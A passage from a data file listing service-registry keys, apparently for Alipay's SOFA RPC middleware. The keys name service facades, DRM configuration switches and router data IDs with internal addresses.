TANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.activity.signfor.TopAwardCollectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.PanicBuyingMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.galaxy.FinOutfluxGalaxyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.api.plan.PlanMixVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanamountprod.common.service.facade.service.credit.CreditProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.97.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mirrorprod.facade.gateway.service.MirrorBackFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.zcache.log.finpwm.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.tenant.facade.TenantConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fastq-easycase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csvoice.service.facade.api.GoodVoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.repay.DrawndnBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.GlobalTenantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscvprod.common.service.facade.InsDocumentExtractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CERTIFY_CERTIFY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.ProductPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.routeclient.DefaultRouteCoordinator.decisionRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbcateringorder.common.service.facade.api.order.CateringOrderLogSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.point.CommonPointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.open.facade.DiscussionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctuevent.CtuEventDispatchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.DrillCalendarFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniprod.common.service.facade.api.minitemplatemsg.MiniFormIdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.file.InstFileImporterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.TrInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundup.facade.api.fundscheme.FundFluxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.spi.api.ToolDataViewApi:1.0:regression@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.bill.AssetBillSummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.mng.CertificateManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.MerchantSettleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scenecore.facade.prize.PrizeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.aoliao.api.RecManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.EbppChannelRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.17.168.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.insure.AutoQuoteCityFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsroalipay.facade.namelist.NameListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cstrategycenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdGlobalMerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.finpwm.clientDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cifin.daemon.event.drm.BankCardAsyncCompensateDrmResource.commonLoadLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sffcore.MngLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopTaskInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.outer.InternalFinanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","bic@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanGrantBankDrm.instIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxagg.common.service.facade.api.management.datasource.DataSourceMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.hyp.QueryServInfoForHYPFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.cpc.rpc.SocialCirclePBService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoscene.common.service.facade.api.fixed.FinsFixedOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.datapoint.LocalDataPointValidateService:1.0:ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.ActivityBudgetManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.apportion.service.UserApportionCalendarService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fctaxcenter_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.updateUserProfile,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.common.service.facade.DiscountCampTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.octopus.core.facade.ServiceInfoQueryFacade:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrmcore.common.service.facade.service.opscloud.MrmRuleRelInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superlink.service.facade.api.transaction.MessageReceiveService:1.0:superlink@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:invalid-schema-format@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwmdas.common.service.facade.TrafficDataQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loancore.friendloan.service.facade.api.query.FlcArgQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.isdsp.common.service.facade.DsOdpsTableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:minicore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.tbase.ALIPAYINTLJSESSIONID.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imaspmng.common.service.facade.SopFlowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.muac.api.facade.qdb.DistrictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.BatchArchiveNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.trade.service.FintradeCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CHECKRULEEXEC#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.218.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:dchainprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_MABP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paymentmng.service.facade.depositback.DbackSlipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.common.service.facade.MNotifyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revmng.common.service.facade.RevmngCloseAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.acceptance.AcceptanceTaskCommitDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.service.DiscountProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtPcdBizTypeCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.LargePayBankTaskInfoDRM.bizTaskConf,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.whiteListRPCLoadTest:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegeocoding.common.service.facade.district.ReverseProFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExRateCodeMappingQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.tlou.TlouRelationP2PQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_P_IFINFLUX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dmeta.facade.virtualcanvas.DmetaVirtualCanvasRelationReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsReserveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omoaidbase.biz.service.msgbroker.EventHandler:1.0:agreementFileExchangeHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.BizApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.applet.consult.MerchantWithholdAlipayConsult:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iotface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditprod.datasync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.token.spi.VerifyFlowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditrmp.facade.taskmanage.TaskConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbasiclib.ad.event.CommonEventFacade:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zcache.switcher.customerTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mctlib.biz.manager.service.MctTaskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insproductcore.facade.service.InsFcCatalogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.common.service.facade.device.DeviceManageFacade:1.0:mobileacauth@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_LOAN_DEFAULT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoinsprod.common.service.facade.MarketingActivityFacadeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.monitor.AlertRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianWaterMark,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.OfflinepayWhiteListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.corprisk.CorpRiskFlagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.modifyThread,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.WorkOrderRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.meshyorg.com.service.integration.fcbuservice.UserFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cifin.customerEventDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gpfnfiveaccount.facade.api.AccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","frastress@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodtrans.senior.manage.facade.SubProductRelationPropertyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.BizConditionQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.proDispatchSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_newSYCDepositLimitCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmmccore.configparam.service.facade.ConfigParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenesas.core.service.repository.OrderExecutionMainRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artweb.sparta.facade.SpartaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.196.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:bioperation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insusercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.service.facade.AccountSecurityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.transport.TransportManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.amlmatrix.common.component.queue.service.QueueDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antflow.common.base.msq.MsgService:1.0:antflow.msq.proxy-11.166.237.222@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.eventconfig.api.EventConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:uniqueId-0001@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkfinconsign.common.service.facade.datasync.CommonDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:sesameCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.PcreditBearingintProdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.dycode.DynamicCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.facade.api.MoveWhiteListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.210.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuprod.biz.service.gw.community.api.forum.ForumManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wkprod.common.service.facade.pay.WkCardBillInfoQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.tag.MrchprodLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.newEventServiceStartId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frscenter.common.service.facade.api.ScenarioTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.FinhadecisionMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finpwm.finpwmXTradeSlaveDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.allowWfinGotone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.common.service.integration.masterdata.result.code.ResultCodeMapQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.SkuModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.gray.VcpGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.PriceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.FeedbackManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.market.MarketAnalysisReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityInfoNewDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.service.facade.YebFundFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.topology.common.service.facade.api.topology.TopologyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexpgrowth.facade.content.QueryContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.biz.mwallet.pass.manager.PassManagerV95:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custcpt.facade.UserDeviceRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.RrpcAccessAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocreative.common.service.facade.LubanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CREDITEXPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualUpdateYieldData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_MCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FollowReviseTriggerDRM.reviseNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.pamir.security.PamSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.batch.BusinessStageMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insendorseprod.common.service.cs.InsCsEndorsementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITAUTHFRONT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.ConfigOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.bds.facade.craas.SupportRiskEvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.auth.UserAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.BizPictureConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeRefundQueryFacade:1.0:tradequeryprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:inchannel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:amldataproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.category.BizCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.mrch.flood.control.commonBizPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.141.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.catalog.StandardCatalogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.golden.common.facade.charge.ChargeNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_CERTIFY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.38.61.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finsupport:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-imemberprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.smartant.SmartAntBannerCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.194.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfmdm.common.service.facade.api.MasterDataCcQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:assetfluxdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.commonagentfund.api.CaftransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.errormsg.ErrorMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancore.p2p.service.facade.